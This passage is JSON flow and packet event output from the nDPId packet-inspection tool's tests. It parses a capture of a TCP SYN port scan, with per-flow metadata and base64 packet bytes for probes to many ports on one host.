-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsFYYAADEGAe2sEAAIQA2GNIzTBpfdU4MZAAAAAGACCAAp9QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKYAADsGBM2sEAAIQA2GNIzTF3DdU4MZAAAAAGACEAARHAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsV0YAACkGyCysEAAIQA2GNIzTCK7dU4MZAAAAAGACCAAn3gAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsJAgAADIG8mqsEAAIQA2GNIzTFSbdU4MZAAAAAGACDAAXZgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAssoIAADUGYPCsEAAIQA2GNIzTA97dU4MZAAAAAGACCAAsrgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsjhQAACYGlF6sEAAIQA2GNIzTKX3dU4MZAAAAAGACDAADDwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAslV0AADoGeRWsEAAIQA2GNIzTCi3dU4MZAAAAAGACDAAiXwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsFwUAADIG\/22sEAAIQA2GNIzTKYXdU4MZAAAAAGACDAADBwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsnWIAACcGhBCsEAAIQA2GNIzTBCDdU4MZAAAAAGACEAAkbAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4GwAADsGLQasEAAIQA2GNIzSB\/bdUoMYAAAAAGACEAAgmQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsGQQAAC0GAm+sEAAIQA2GNIzSN57dUoMYAAAAAGACCAD48AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAspb4AACcGe7SsEAAIQA2GNIzSAgLdUoMYAAAAAGACEAAmjQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsFWEAADEGAhKsEAAIQA2GNIzSDyjdUoMYAAAAAGACCAAhZwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADMGcf2sEAAIQA2GNIzSRdXdUoMYAAAAAGACEADiuQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsMF0AADkG3xWsEAAIQA2GNIzSHmHdUoMYAAAAAGACCAASLgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsn0UAADYGcy2sEAAIQA2GNIzSEvDdUoMYAAAAAGACDAAZnwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4gcAADQGMmusEAAIQA2GNIzSgArdUoMYAAAAAGACBAC0hAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsXREAADQGt2GsEAAIQA2GNIzSPtDdUoMYAAAAAGACBAD1vgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsteEAACUGbZGsEAAIQA2GNIzSBjrdUoMYAAAAAGACCAAqVQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsnHoAADgGc\/isEAAIQA2GNIzS\/ejdUoMYAAAAAGACBAA2pgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAslDEAACYGjkGsEAAIQA2GNIzSBDPdUoMYAAAAAGACDAAoXAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsoWoAADoGbQisEAAIQA2GNIzSBRTdUoMYAAAAAGACDAAnewAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAso5AAACsGeeKsEAAIQA2GNIzSCo3dUoMYAAAAAGACEAAeAgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsvS0AAC4GXUWsEAAIQA2GNIzSA0vdUoMYAAAAAGACDAApRAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAscKEAADYGodGsEAAIQA2GNIzSB9XdUoMYAAAAAGACDAAkugAAAgQFtA=="} 